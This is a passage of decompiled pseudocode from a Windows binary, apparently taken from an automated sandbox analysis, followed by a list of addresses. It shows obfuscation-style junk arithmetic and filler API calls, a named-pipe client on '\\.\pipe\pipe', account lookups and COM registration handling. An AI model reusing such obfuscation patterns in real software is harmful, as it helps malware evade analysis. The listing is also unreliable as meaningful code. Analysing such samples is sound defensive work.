					 *0x442a98 =  *0x442a98 + ( *(_t1101 + 0x14) & 0x0000ffff) - (_t810 & 0x0000ffff) + (_t810 & 0x0000ffff);
				}
				 *((intOrPtr*)(_t1101 + 0x5c)) = 0;
				 *((intOrPtr*)(_t1101 + 0x60)) = 0;
				_t1122 =  *0x442aa0; // 0x0
				if(_t1122 != 0) {
					_t496 =  *(_t1101 + 0x14);
				} else {
					_t496 = 0 - ( *(_t1101 + 0xa0) & 0x0000ffff);
				}
				if(_t496 == 0) {
					 *0x442a98 =  *0x442a98 + ( *(_t1101 + 0x14) & 0x0000ffff) - (_t810 & 0x0000ffff) + (_t810 & 0x0000ffff);
				}
				_push(_t1101 + 0x1c);
				_push(_t1101 + 0x14);
				_push(0);
				_push(0);
				_push(2);
				_push(0);
				_push(2); // executed
				L00421DD8(); // executed
				_t1057 =  *((intOrPtr*)(_t1101 + 0x10));
				_t498 = E00422A18(_t1101 + 0x1c, _t1036, _t1057, _t1057);
				_t1102 = _t1101 + 4;
				_push(_t1102 + 0x20);
				_push(_t1102 + 0x20);
				_push(_t1057);
				_push(_t498);
				_push(2);
				_push(0);
				_push(2); // executed
				L00421DD8(); // executed
				if(_t498 != 0) {
					_t763 =  *(_t1102 + 0x20);
					if(_t763 != 0) {
						 *0x442a94 =  &(_t763[ *0x442a94]);
					}
				}
				 *(_t1102 + 0x4c) =  *(_t1102 + 0x8c8);
				 *((intOrPtr*)(_t1102 + 0x44)) = 0;
				 *(_t1102 + 0xb4) = 0;
				 *((intOrPtr*)(_t1102 + 0xb8)) = 0;
				 *(_t1102 + 0xbc) = 0;
				 *((intOrPtr*)(_t1102 + 0x7c)) =  *((intOrPtr*)(_t1102 + 0x8bc));
				asm("cdq");
				 *(_t1102 + 0x3c) = 0;
				_t1037 = 0;
				_t1058 = 0;
				_t782 = 1;
				 *(_t1102 + 0x1c) = 0x59;
				_t1084 =  *(_t1102 + 0x1c);
				 *(_t1102 + 0xd8) = 0;
				 *(_t1102 + 0x20) = 1;
				 *((intOrPtr*)(_t1102 + 0x5c)) = 0;
				 *(_t1102 + 0x10) = 0 / ( *(_t1102 + 0x68) + 0x4e) * 0;
				do {
					GetDC(0);
					_t1084 = _t1084 - 1;
				} while (_t1084 != 0);
				 *((intOrPtr*)(_t1102 + 0x78)) = CreateEventA(_t1084, _t1084, _t1084, "Xstore");
				 *(_t1102 + 0x58) = _t1084;
				 *(_t1102 + 0x20) = _t1084;
				 *(_t1102 + 0x24) = 0xa;
				 *(_t1102 + 0x2c) = _t1084;
				 *(_t1102 + 0x30) = _t1084;
				 *(_t1102 + 0xcc) = _t1084;
				 *(_t1102 + 0xd0) = _t1084;
				_t506 = GetClassLongA(_t1084, 0xffffffe6);
				_t945 =  *0x442aa8; // 0x0
				SetClassLongA(_t945, 0xffffffe6, _t506 | 0x00000200);
				GetCursorPos(_t1102 + 0x24);
				while(1) {
					 *(_t1102 + 0x4c) =  *(_t1102 + 0x4c) +  *((intOrPtr*)(_t1102 + 0x7ad)) -  *0x442a98;
					GetCursorPos(_t1102 + 0xc4);
					_t512 =  *0x442aac; // 0x0
					_t1087 =  *(_t1102 + 0x68) - _t512 *  *0x442a98 + 1;
					 *(_t1102 + 0xe8) = 0;
					 *0x4335e8(0, 0, _t1102 + 0xdc);
					if( *(_t1102 + 0x24) !=  *(_t1102 + 0xc4) ||  *(_t1102 + 0x28) !=  *(_t1102 + 0xc8)) {
						__eflags =  *(_t1102 + 0x6c);
						if( *(_t1102 + 0x6c) == 0) {
							_t523 = (((0xb60b60b7 *  *(_t1102 + 0x68) >> 0x20) +  *(_t1102 + 0x68) >> 6 >> 0x1f) + ((0xb60b60b7 *  *(_t1102 + 0x68) >> 0x20) +  *(_t1102 + 0x68) >> 6)) * _t1037 - ( *0x442aac & 0x0000ffff) - _t1058 -  *(_t1102 + 0x4c);
							__eflags = _t523;
							 *(_t1102 + 0x10) =  &(_t523[( *0x442a94 & 0x0000ffff) + 0x2c]);
							_t525 =  *0x442a98; // 0x0
						} else {
							_t525 =  *(_t1102 + 0xd8) *  *0x442a98 -  *(_t1102 + 0x68);
							 *0x442a98 = _t525;
						}
						 *(_t1102 + 0x24) =  *(_t1102 + 0xc4);
						 *(_t1102 + 0x28) =  *(_t1102 + 0xc8);
						__eflags = _t525 - ( *(_t1102 + 0x88) & 0x000000ff) +  *(_t1102 + 0x6c) - (_t782 & 0x000000ff);
						if(_t525 - ( *(_t1102 + 0x88) & 0x000000ff) +  *(_t1102 + 0x6c) > (_t782 & 0x000000ff)) {
							_t1087 = _t1087 +  *0x442a94;
							__eflags = _t1087;
						}
						_t155 = _t1102 + 0x50;
						 *_t155 =  &(( *(_t1102 + 0x50))[1]);
						__eflags =  *_t155;
					} else {
						_t1058 = 0x175b75a - _t782 +  *(_t1102 + 0x3c);
						 *(_t1102 + 0xdc) = ( *0x442a94 & 0x0000ffff) * _t1058 *  *(_t1102 + 0x34);
						_t1037 = 0x175b75a;
						 *(_t1102 + 0xd8) =  *(_t1102 + 0xd8) -  *(_t1102 + 0xdc) + ((_t782 * _t1087 - (0x86186187 * _t782 * _t1087 >> 0x20) >> 1) + (0x86186187 * _t782 * _t1087 >> 0x20) >> 4);
						CommDlgExtendedError();
						_t782 =  *(_t1102 + 0x20);
					}
					if(0 != 0) {
						_t158 = _t1102 + 0x3c;
						 *_t158 =  &(( *(_t1102 + 0x3c))[ *(_t1102 + 0x90) & 0x0000ffff]);
						__eflags =  *_t158;
					} else {
						_t1037 = _t1037;
					}
					_t954 =  *(_t1102 + 0x50);
					_t824 =  *0x442aa0; // 0x0
					if(_t954 != 0) {
						if( *((intOrPtr*)(_t1102 + 0x7c)) > _t824) {
							_t163 = _t1102 + 0xbc;
							 *_t163 =  *(_t1102 + 0xbc) - _t1058;
							__eflags =  *_t163;
						} else {
							 *(_t1102 + 0xb4) =  ~0x00000000;
						}
						 *((intOrPtr*)(_t1102 + 0x18)) =  *((intOrPtr*)(_t1102 + 0x18)) + 1;
					}
					if(_t954 > 1) {
						break;
					}
					if(_t1102 + 0x1a4 != 0) {
						_t782 =  &(_t782[0x76d - (0xba2e8ba3 *  *(_t1102 + 0xd8) >> 0x20 >> 5)]);
						__eflags = _t782;
						 *(_t1102 + 0x20) = _t782;
					} else {
						 *0x442a94 =  *0x442a94 +  *(_t1102 + 0x4c) *  *0x442aac * (_t1102 + 0x6b0);
					}
					if( *((intOrPtr*)(_t1102 + 0x18)) == 5 - _t824) {
						__eflags =  *0x442aa4;
						if(__eflags == 0) {
							_t782 =  &(_t782[_t824]);
							__eflags = _t782;
						}
						break;
					} else {
						_t738 =  *0x442aa8; // 0x0
						asm("cdq");
						if(_t738 /  &(_t824[0x3d]) ==  *(_t1102 + 0xb4)) {
							_t1087 =  *0x442a98; // 0x0
						} else {
							 *(_t1102 + 0xb4) =  *0x442aac & 0x000000ff;
						}
						WaitForSingleObject( *(_t1102 + 0x70), 0xbb7);
						_t185 = _t1102 + 0x1c;
						 *_t185 =  *(_t1102 + 0x1c) - 1;
						_t1141 =  *_t185;
						if( *_t185 != 0) {
							continue;
						} else {
							break;
						}
					}
				}
				L004084F0(_t1102 + 0x70, _t1037, _t1058, _t1141);
				 *(_t1102 + 0x50) =  *(_t1102 + 0x4c);
				L0040FAE0(_t1102 + 0x74, _t1141, _t1102 + 0x4c);
				 *(_t1102 + 0x4c) =  *(_t1102 + 0x34);
				E0040FB30(_t1102 + 0x74, _t1141, _t1102 + 0x4c);
				if((_t1087 & 0x0000ffff) <  *(_t1102 + 0x90) - ( *(_t1102 + 0x6c) & 0x000000ff)) {
					_t910 =  *0x442aa0; // 0x0
					asm("cdq");
					 *0x442a94 =  &(( &(_t782[ *(_t1102 + 0x34) /  &(_t910[0x35])]))[ *0x442aa4 & 0x000000ff]);
				}
				L004098D0(_t1102 + 0x70);
				E0040FAA0(_t1102 + 0x70, _t1037);
				 *((intOrPtr*)(_t1102 + 0x7c)) = 2;
				 *(_t1102 + 0x28) = 0;
				 *((char*)(_t1102 + 0xec)) = 0;
				E00422840(_t1102 + 0xe5, 0, 0x2f);
				_t1103 = _t1102 + 0xc;
				do {
					_t539 = WaitNamedPipeA("\\\\.\\pipe\\pipe", 0xffffffff); // executed
					if(_t539 == 0) {
						 *0x442a98 = 1;
					}
					_t540 = CreateFileA("\\\\.\\pipe\\pipe", 0xc0000000, 0, 0, 3, 0, 0); // executed
					_t1059 = _t540;
				} while ( *0x442aa4 == 0 && _t1059 == 0xffffffff);
				_t541 = SetNamedPipeHandleState(_t1059, _t1103 + 0x78, 0, 0); // executed
				if(_t541 == 0) {
					CloseHandle(_t1059);
				}
				_t1039 =  *0x4331ec;
				do {
					_t542 = WriteFile(_t1059, "1", 0x30, _t1103 + 0x20, 0); // executed
					if(_t542 == 0) {
						CloseHandle(_t1059);
					}
					_t544 = ReadFile(_t1059, _t1103 + 0xec, 0x30, _t1103 + 0x20, 0); // executed
					if(_t544 == 0) {
						CloseHandle(_t1059);
					}
				} while ( *0x442aac == 0 ||  *0x442aa4 == 0 ||  *(_t1103 + 0x6c) == 0);
				_t960 = _t1103 + 0x5c;
				 *(_t1103 + 0x2c) = 0;
				 *((intOrPtr*)(_t1103 + 0x64)) = 0;
				LookupAccountNameA(_t1103 + 0x4f4, _t1103 + 0x4f4, 0, _t1103 + 0x5c, 0, _t1103 + 0x1c, _t1103 + 0x70); // executed
				_t785 =  *0x433268;
				_t548 = GetLastError();
				_t1153 = _t548 - 0x534;
				if(_t548 != 0x534) {
					__eflags = GetLastError() - 0x7a;
					if(__eflags == 0) {
						_t1010 =  *(_t1103 + 0x50);
						_t1075 =  *0x4331f4;
						_t1051 = LocalAlloc(0x40,  *(_t1103 + 0x50));
						__eflags = _t1051;
						if(__eflags == 0) {
							_push(GetLastError());
							_push(L"LocalAlloc failed with %d\n");
							L004242F0(_t785, _t1010, _t1051, _t1075, __eflags);
							_t1103 = _t1103 + 8;
						}
						_t1076 = LocalAlloc(0x40,  *(_t1103 + 0x18));
						__eflags = _t1076;
						if(__eflags == 0) {
							_push(GetLastError());
							_push(L"LocalAlloc failed with %d\n");
							L004242F0(_t785, _t1010, _t1051, _t1076, __eflags);
							_t1103 = _t1103 + 8;
						}
						_t909 = _t1103 + 0x4f4;
						_t1012 = _t909;
						__eflags = LookupAccountNameA(_t909, _t909, _t1051, _t1103 + 0x5c, _t1076, _t1103 + 0x1c, _t1103 + 0x70);
						if(__eflags == 0) {
							_push(GetLastError());
							_push(L"LookupAccountName failed with %d\n");
							L004242F0(_t785, _t1012, _t1051, _t1076, __eflags);
							_t1103 = _t1103 + 8;
						}
						__eflags = _t1076;
						if(__eflags != 0) {
							LocalFree(_t1076);
						}
					}
				} else {
					_push(GetLastError());
					_push(L"LookupAccountName failed with %d\n");
					L004242F0(_t785, _t960, _t1039, _t1059, _t1153);
					_t1103 = _t1103 + 8;
				}
				_t837 =  *(_t1103 + 0x8c8);
				_t786 =  *(_t1103 + 0x8bc);
				_t1040 =  *0x4330d4;
				 *(_t1103 + 0x60) = 0;
				 *(_t1103 + 0x5c) = 0;
				 *(_t1103 + 0x60) = 0;
				 *((intOrPtr*)(_t1103 + 0x58)) = 0;
				_t1060 = 9;
				 *(_t1103 + 0xc8) = 0;
				 *(_t1103 + 0x1c) = _t837;
				 *(_t1103 + 0x5c) = 0;
				 *(_t1103 + 0x60) = 0;
				 *(_t1103 + 0x24) = 5;
				 *(_t1103 + 0x28) = 0x36;
				 *(_t1103 + 0x20) = 0 -  *(_t1103 + 0xc0) * _t837;
				do {
					E00410910(_t786, _t1103 + 0xb0, _t1040, 0, 0);
					_push(0);
					_push(_t1103 + 0x28);
					_t554 = L0040E750(_t1103 + 0xb8, 0);
					E00408FE0(_t786, _t1103 + 0xbc);
					_t556 =  *0x442aa4; // 0x0
					 *(_t1103 + 0xcc) = _t556;
					_push(L0040E750(_t1103 + 0xb8, 0, _t1103 + 0xc8, 0, _t1103 + 0x78, _t554));
					_push(_t1103 + 0x84);
					E00408FE0(_t786, _t1103 + 0xbc);
					L00409900(_t1103 + 0xb0);
					SetStretchBltMode(0, 4);
					L004107E0();
					_t1060 = _t1060 - 1;
					_t1155 = _t1060;
				} while (_t1060 != 0);
				_t1041 = 0;
				_t1062 =  *(_t1103 + 0x34) + ( *(_t1103 + 0x6c) + 1) * 2 +  *(_t1103 + 0x6c) + 1;
				SetAbortProc(0, 0x4047a0);
				 *((intOrPtr*)(_t1103 + 0x44)) = 0;
				 *((intOrPtr*)(_t1103 + 0x48)) = 0;
				 *((intOrPtr*)(_t1103 + 0x4c)) = 0;
				 *((intOrPtr*)(_t1103 + 0x48)) = 0;
				DrawFrameControl( *(_t1103 + 0x70), _t1103 + 0x40, 4, 0x4210);
				L004084F0(_t1103 + 0xc4, 0, _t1062, _t1155);
				if(_t1062 <= 0) {
					L91:
					_t1092 = 0;
					LoadImageA( *(_t1103 + 0x8bc),  *(_t1103 + 0xc0) & 0x0000ffff, 0, 0, 0, 0);
					_t1042 =  *( *(_t1103 + 0xc4));
					if(_t1062 <= 0) {
						L95:
						E00417E60(_t1103 + 0x54, _t1042, 0);
						_push(_t1103 + 0x24);
						_push(_t1103 + 0x74);
						 *(_t1103 + 0x2c) = 0x7a;
						 *(_t1103 + 0x30) = 0x30;
						L00410520(_t786, _t1103 + 0x5c, 0);
						_t853 =  *0x442aa0; // 0x0
						asm("cdq");
						_t290 =  &(_t853[0x56]); // 0x56
						_t1043 = _t290;
						_t787 =  *(_t1103 + 0x68);
						_t1044 =  *(_t1103 + 0x84);
						_t1163 = 0 / _t1043 * _t787;
						if(0 / _t1043 * _t787 == 0) {
							_t1044 =  *(_t1103 + 0x1c);
						}
						_t300 =  *(_t1103 + 0x34) + 0x8e; // 0x8e
						_t1063 =  *((intOrPtr*)(_t1103 + 0x98));
						L004047B0(_t1181, _t1063, _t1062,  &(_t853[_t300]));
						_push(_t1103 + 0x24);
						_push(_t1103 + 0x74);
						_t855 = _t1103 + 0x5c;
						 *(_t1103 + 0x2c) = _t1044;
						 *(_t1103 + 0x30) = 0x76d;
						L00410520(_t787, _t1103 + 0x5c, _t1163);
						if(_t787 != 1) {
							 *((intOrPtr*)(_t1063 + 1)) = _t1103 + 0x8bc;
						}
						asm("fild dword [esp+0x20]");
						_t580 = L00424780(_t855, _t1181);
						asm("fisub dword [esp+0x88]");
						 *(_t1103 + 0xc0) = L00424690(_t580, _t1181 *  *0x4363f8 +  *0x4363f0 -  *0x436400);
						E004179D0();
						E0040FAA0(_t1103 + 0xc4, _t1044);
						_t1045 =  *(_t1103 + 0x8c8);
						_t788 = 0;
						 *(_t1103 + 0x68) = 0;
						 *(_t1103 + 0x6c) = 0;
						 *(_t1103 + 0x68) = 0;
						 *(_t1103 + 0x6c) = 0;
						 *(_t1103 + 0x70) = 0;
						 *(_t1103 + 0xc4) = 0;
						 *(_t1103 + 0xc8) = 0;
						 *(_t1103 + 0xcc) = 0;
						 *(_t1103 + 0x94) = _t1092;
						 *(_t1103 + 0x28) = _t1092;
						 *(_t1103 + 0x60) = _t1092;
						 *(_t1103 + 0x34) = _t1092;
						 *(_t1103 + 0x38) = _t1092;
						 *(_t1103 + 0xd4) = _t1092;
						 *(_t1103 + 0xd8) = _t1092;
						 *(_t1103 + 0x74) = CreateEventA(_t1092, _t1092, _t1092, "denfers");
						GetCursorPos(_t1103 + 0x24);
						_t1064 =  *(_t1103 + 0x10);
						while(1) {
							_t971 =  *0x442aa0; // 0x0
							if(_t971 -  *(_t1103 + 0x68) >= _t788) {
								_t702 =  *0x442aac; // 0x0
								 *0x442a94 = _t702 +  *(_t1103 + 0x20);
							}
							GetCursorPos(_t1103 + 0xc4);
							 *(_t1103 + 0x50) =  *(_t1103 + 0x50) + 1;
							_t790 = 5;
							do {
								 *0x442a98 =  *0x442a98 + DragQueryFileA(0, 0xffffffff, _t1103 + 0x3b0, 0x104);
								_t859 =  *0x442aa0; // 0x0
								if(_t1045 /  &(_t859[0x61]) * _t1092 != 0) {
									_t902 =  *0x442aa4; // 0x0
									asm("cdq");
									_t1045 = (_t1064 & 0x0000ffff) / (_t902 + 0x44);
								}
								_t790 = _t790 - 1;
							} while (_t790 != 0);
							_t594 =  *(_t1103 + 0xc4);
							_t861 =  *(_t1103 + 0xc8);
							if( *(_t1103 + 0x24) != _t594 ||  *(_t1103 + 0x28) != _t861) {
								 *(_t1103 + 0x84) =  &(( *(_t1103 + 0x84))[1]);
								 *(_t1103 + 0x24) = _t594;
								 *(_t1103 + 0x28) = _t861;
							}
							if( *(_t1103 + 0xb4) != 0) {
								_t358 = _t1103 + 0xb4;
								 *_t358 =  *(_t1103 + 0xb4) -  *(_t1103 + 0xc0);
								__eflags =  *_t358;
							} else {
								 *(_t1103 + 0x5c) =  *(_t1103 + 0x5c) + ( *0x442aa8 & 0x0000ffff);
							}
							_t1065 =  *(_t1103 + 0x84);
							if(_t1065 != 0) {
								 *(_t1103 + 0x18) =  *(_t1103 + 0x18) + 1;
								_push(_t1103 + 0x7c);
								_push(0);
								L00432D08();
							}
							if(_t1065 > 1 ||  *(_t1103 + 0x18) > 4) {
								L120:
								_t791 =  *(_t1103 + 0x68);
								 *0x442a94 =  *0x442a94 + (0x38e38e39 *  *(_t1103 + 0x6c) >> 0x20 >> 3 >> 0x1f) + (0x38e38e39 *  *(_t1103 + 0x6c) >> 0x20 >> 3) - ( *0x442aa8 & 0x000000ff) -  *0x442aac +  *(_t1103 + 0x38) +  *(_t1103 + 0xc8);
								EnableMenuItem(_t791, 0xc, 0);
								__eflags =  *(_t1103 + 0x8bc);
								if( *(_t1103 + 0x8bc) == 0) {
									 *(_t1103 + 0x3c) = 0;
									 *(_t1103 + 0x90) = 0;
									 *((intOrPtr*)(_t1103 + 0x58)) = 0;
									 *((intOrPtr*)(_t1103 + 0x8c)) = 0;
									 *(_t1103 + 0x20) = 0;
									 *0x433608(0, 2);
									_t1071 =  *0x433604;
									_t635 =  *_t1071(0x433ffc, 0, 1, 0x43a508, _t1103 + 0x34);
									_t1049 =  *0x4335b8;
									__eflags = _t635;
									if(_t635 < 0) {
										 *_t1049();
									}
									_t636 =  *(_t1103 + 0x34);
									_t638 =  *((intOrPtr*)( *(_t636->nLength)))(_t636, 0x433fdc, _t1103 + 0x88);
									__eflags = _t638;
									if(_t638 < 0) {
										_t686 =  *(_t1103 + 0x34);
										 *((intOrPtr*)( *((intOrPtr*)(_t686->nLength + 8))))(_t686);
										 *_t1049();
									}
									_t639 =  *(_t1103 + 0x34);
									_t641 =  *((intOrPtr*)( *(_t639->nLength)))(_t639, 0x433fec, _t1103 + 0x50);
									__eflags = _t641;
									if(_t641 < 0) {
										_t681 =  *((intOrPtr*)(_t1103 + 0x88));
										 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 8))))(_t681);
										_t683 =  *(_t1103 + 0x34);
										 *((intOrPtr*)( *((intOrPtr*)(_t683->nLength + 8))))(_t683);
										 *_t1049();
									}
									_t643 =  *_t1071(_t1103 + 0x64, 0, 1, 0x43a4f8, _t1103 + 0x84);
									__eflags = _t643;
									if(_t643 >= 0) {
										_t661 =  *(_t1103 + 0x34);
										_t662 =  *((intOrPtr*)( *((intOrPtr*)(_t661->nLength + 0xc))))(_t661,  *(_t1103 + 0x84), L"Push Source");
										__eflags = _t662;
										if(_t662 >= 0) {
											_t668 =  *_t1071(0x43400c, 0, 1, 0x43a4f8, _t1103 + 0x18);
											__eflags = _t668;
											if(_t668 >= 0) {
												_t669 =  *(_t1103 + 0x34);
												_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t669->nLength + 0xc))))(_t669,  *(_t1103 + 0x18), L"Enhanced Video Renderer");
												__eflags = _t671;
												if(_t671 >= 0) {
													_t672 =  *(_t1103 + 0x34);
													 *((intOrPtr*)( *((intOrPtr*)(_t672->nLength + 0x30))))(_t672, 0);
													_t674 =  *((intOrPtr*)(_t1103 + 0x88));
													_t675 =  *((intOrPtr*)( *((intOrPtr*)( *_t674 + 0x1c))))(_t674);
													__eflags = _t675;
													if(_t675 >= 0) {
														_t678 =  *(_t1103 + 0x50);
														 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 0x24))))(_t678, 0x2710, _t1103 + 0x70);
													}
													_t676 =  *((intOrPtr*)(_t1103 + 0x88));
													 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 0x24))))(_t676);
												}
											}
										}
										_t663 =  *(_t1103 + 0x84);
										__eflags = _t663;
										if(_t663 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t663 + 8))))(_t663);
										}
										_t664 =  *(_t1103 + 0x18);
										__eflags = _t664;
										if(_t664 != 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t664 + 8))))(_t664);
										}
									}
									_t644 =  *((intOrPtr*)(_t1103 + 0x88));
									 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 8))))(_t644);
									_t646 =  *(_t1103 + 0x50);
									 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 8))))(_t646);
									_t648 =  *(_t1103 + 0x34);
									 *((intOrPtr*)( *((intOrPtr*)(_t648->nLength + 8))))(_t648);
									 *0x4335b8();
									_t651 =  *0x442a98; // 0x0
									_t1072 =  *0x442aa0; // 0x0
									_t652 = GetDlgItem(0, _t651);
									 *0x4335d0(0);
									_t1096 =  *0x4335bc;
									 *_t1096(_t1072, 1, 0);
									 *0x4335c0(_t652, _t1072);
									 *0x4335c4(GetTopWindow(0));
									 *_t1096(_t1072, 0, 1);
									__eflags =  *0x442aa0;
									if( *0x442aa0 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *_t1072 + 8))))(_t1072);
									}
									 *0x4335cc();
								}
								E00422840(_t1103 + 0xe4, 0, 0x30);
								_t1046 =  *(_t1103 + 0x78);
								_t1104 = _t1103 + 0xc;
								 *(_t1104 + 0xf0) = 0x30;
								 *(_t1104 + 0xf4) = 1;
								 *((intOrPtr*)(_t1104 + 0xfc)) = 0;
								_t601 = SetMenuItemInfoA(_t791, _t1046, 0, _t1104 + 0xe0);
								__eflags = _t601;
								if(_t601 != 0) {
									DrawMenuBar(0);
								} else {
									GetLastError();
								}
								E00422840(_t1104 + 0xe4, 0, 0x30);
								_t1105 = _t1104 + 0xc;
								 *(_t1105 + 0xf0) = 0x30;
								 *(_t1105 + 0xf4) = 1;
								GetMenuItemInfoA(_t791, _t1046, 0, _t1105 + 0xe0);
								_t1067 =  *0x442aa8; // 0x0
								BeginPaint(_t1067, _t1105 + 0x15c);
								EndPaint(_t1067, _t1105 + 0x15c);
								 *(_t1105 + 0x164) = 1;
								GetClientRect(_t1067, _t1105 + 0x164);
								EnumDateFormatsA( *(_t1105 + 0x90), 0x400, 1);
								__eflags = _t791 -  *0x442aa4; // 0x0
								if(__eflags < 0) {
									 *0x442aac =  *(_t1105 + 0x3ac + _t791 * 4);
								}
								_t1068 =  *(_t1105 + 0x14);
								__eflags = _t1068;
								if(_t1068 == 0) {
									L157:
									L00405200();
									E00405010(4, 5);
									 *0x4335c8();
									__eflags =  *((char*)(_t1105 + 0x8f));
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t1105 + 0x8c8)));
										_push( *((intOrPtr*)(_t1105 + 0x8c4)));
										_t614 = L004198E0(_t791, __eflags);
										_t1105 = _t1105 + 8;
										_t1069 = _t614;
									} else {
										 *(_t1105 + 0xe0) = 0x435a4c;
										 *((intOrPtr*)(_t1105 + 0xe4)) = 0;
										 *((intOrPtr*)(_t1105 + 0xe8)) = 0;
										 *((intOrPtr*)(_t1105 + 0xec)) = 0;
										 *(_t1105 + 0xf0) = 0;
										 *(_t1105 + 0xf4) = 0;
										 *((intOrPtr*)(_t1105 + 0xf8)) = 0;
										_t620 = L004050E0(_t1105 + 0xe0);
										_t463 = _t1105 + 0xe0; // 0x435a4c
										_t1069 = _t620;
										L00406820(_t463);
									}
									L004050A0(0x442ad8);
									_t616 =  *0x442b20; // 0x0
									Sleep(_t616);
								} else {
									while(1) {
										_t622 = lstrcmpiA(_t1068, "UnregServer");
										__eflags = _t622;
										if(_t622 == 0) {
											break;
										}
										_t625 = lstrcmpiA(_t1068, "RegServer");
										__eflags = _t625;
										if(_t625 == 0) {
											L0040F280(0x442ad8, 0x64, 1, 0);
											_t1069 = L00409210(0x442ad8, 1, 0);
											L161:
											L004093B0(0x442ad8);
											 *0x4335b8();
											return _t1069;
										}
										_t628 = lstrcmpiA(_t1068, "Automation");
										__eflags = _t628;
										if(_t628 == 0) {
											L156:
											 *((char*)(_t1105 + 0x8f)) = 1;
											goto L157;
										}
										_t629 = lstrcmpiA(_t1068, "Embedding");
										__eflags = _t629;
										if(_t629 == 0) {
											goto L156;
										}
										_t1068 = E00403D10(_t1068, _t1105 + 0xd4);
										_t1105 = _t1105 + 8;
										__eflags = _t1068;
										if(_t1068 != 0) {
											continue;
										}
										goto L157;
									}
									L0040F280(0x442ad8, 0x64, 0, 0);
									_t1069 = L004092A0(0x442ad8, 1, 0);
								}
								goto L161;
							} else {
								 *(_t1103 + 0x3c) = 0;
								 *(_t1103 + 0x40) = 0;
								 *((intOrPtr*)(_t1103 + 0x44)) = 0;
								 *((intOrPtr*)(_t1103 + 0x48)) = 0;
								CreateRectRgnIndirect(_t1103 + 0x38);
								if( *(_t1103 + 0x50) > 0xa) {
									goto L120;
								}
								if((0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7 >> 0x1f) + (0x10a22d39 * ( *0x442a94 & 0x0000ffff) >> 0x20 >> 7) <= 1) {
									 *0x442a94 =  *(_t1103 + 0x6c);
								}
								WaitForSingleObject( *(_t1103 + 0x70), 0xbb6);
								_t788 =  *(_t1103 + 0xb4);
								_t1064 = 0 - ( *0x442aa8 & 0x0000ffff) * _t1092 + _t1045;
								continue;
							}
						}
					}
					asm("fild dword [esp+0x68]");
					_t786 =  *0x433408;
					 *(_t1103 + 0x70) = _t1181;
					do {
						SetWindowLongA(0, 0xffffffec, 0x80);
						asm("fld1");
						_t904 =  *(_t1103 + 0x90);
						_push(_t904);
						 *_t1103 = _t1181;
						 *((char*)(_t1092 + _t904)) =  *((intOrPtr*)(_t1042 + 8));
						L00404710( *((intOrPtr*)(_t1042 + 8)));
						_t1042 =  *_t1042;
						asm("fnstcw word [esp+0x50]");
						_t1181 = _t1181 *  *(_t1103 + 0x74) *  *0x436400;
						 *(_t1103 + 0x80) =  *(_t1103 + 0x50) & 0x0000ffff | 0x00000c00;
						_t1092 =  &(_t1092->nLength);
						asm("fldcw word [esp+0x80]");
						_t1103 = _t1103 + 4;
						asm("fistp qword [esp+0x24]");
						 *(_t1103 + 0x1c) =  *(_t1103 + 0x24);
						asm("fldcw word [esp+0x4c]");
					} while (_t1092 < _t1062);
					_t1092 = 0;
					goto L95;
				} else {
					goto L88;
				}
				do {
					L88:
					_t905 =  *0x442aa0; // 0x0
					asm("cdq");
					if(0 /  &(_t905[0x5d]) *  *(_t1103 + 0x90) != 0) {
						 *0x442a94 =  *0x442a94 - _t786;
						_t1158 =  *0x442a94;
					}
					_t270 = _t1041 + 0x434020; // 0x434020
					E0040FB30(_t1103 + 0xc8, _t1158, _t270);
					_t1041 =  &(_t1041->i);
				} while (_t1041 < _t1062);
				goto L91;
			}

0x0041c95b
0x0041c95b
0x0041c95b
0x0041c965
0x0041c971
0x0041c976
0x0041c977
0x0041c979
0x0041c97b
0x0041c97d
0x0041c97f
0x0041c981
0x0041c986
0x0041c98b
0x0041c990
0x0041c997
0x0041c99c
0x0041c99d
0x0041c99e
0x0041c99f
0x0041c9a1
0x0041c9a3
0x0041c9a5
0x0041c9ac
0x0041c9ae
0x0041c9b4
0x0041c9b6
0x0041c9b6
0x0041c9b4
0x0041c9be
0x0041c9d0
0x0041c9d0
0x0041c9d0
0x0041c9ec
0x0041ca07
0x0041ca11
0x0041ca1b
0x0041ca20
0x0041ca23
0x0041ca25
0x0041ca27
0x0041ca2d
0x0041ca2e
0x0041ca36
0x0041ca3e
0x0041ca46
0x0041ca4b
0x0041ca4d
0x0041ca4f
0x0041ca55
0x0041ca56
0x0041ca5e
0x0041ca66
0x0041ca6b
0x0041ca81
0x0041ca89
0x0041ca8e
0x0041ca95
0x0041ca9a
0x0041ca9b
0x0041ca9d
0x0041ca9f
0x0041caa1
0x0041caa3
0x0041caa5
0x0041caaa
0x0041caaf
0x0041cab4
0x0041cabb
0x0041cac0
0x0041cac1
0x0041cac2
0x0041cac3
0x0041cac5
0x0041cac7
0x0041cac9
0x0041cad0
0x0041cad2
0x0041cad8
0x0041cada
0x0041cada
0x0041cad8
0x0041cae5
0x0041caf0
0x0041caf2
0x0041caf8
0x0041cb0d
0x0041cb15
0x0041cb1d
0x0041cb28
0x0041cb31
0x0041cb33
0x0041cb49
0x0041cb49
0x0041cb55
0x0041cb60
0x0041cb72
0x0041cb72
0x0041cb7d
0x0041cb82
0x0041cb89
0x0041cb99
0x0041cba1
0x0041cba9
0x0041cbb4
0x0041cbbd
0x0041cbbf
0x0041cbd5
0x0041cbd5
0x0041cbe1
0x0041cbec
0x0041cbf2
0x0041cc00
0x0041cc00
0x0041cc08
0x0041cc0c
0x0041cc10
0x0041cc17
0x0041cc25
0x0041cc19
0x0041cc21
0x0041cc21
0x0041cc2b
0x0041cc39
0x0041cc39
0x0041cc43
0x0041cc48
0x0041cc49
0x0041cc4b
0x0041cc4d
0x0041cc4f
0x0041cc51
0x0041cc53
0x0041cc58
0x0041cc5d
0x0041cc62
0x0041cc69
0x0041cc6e
0x0041cc6f
0x0041cc70
0x0041cc71
0x0041cc73
0x0041cc75
0x0041cc77
0x0041cc7e
0x0041cc80
0x0041cc86
0x0041cc88
0x0041cc88
0x0041cc86
0x0041cca0
0x0041cca6
0x0041ccaa
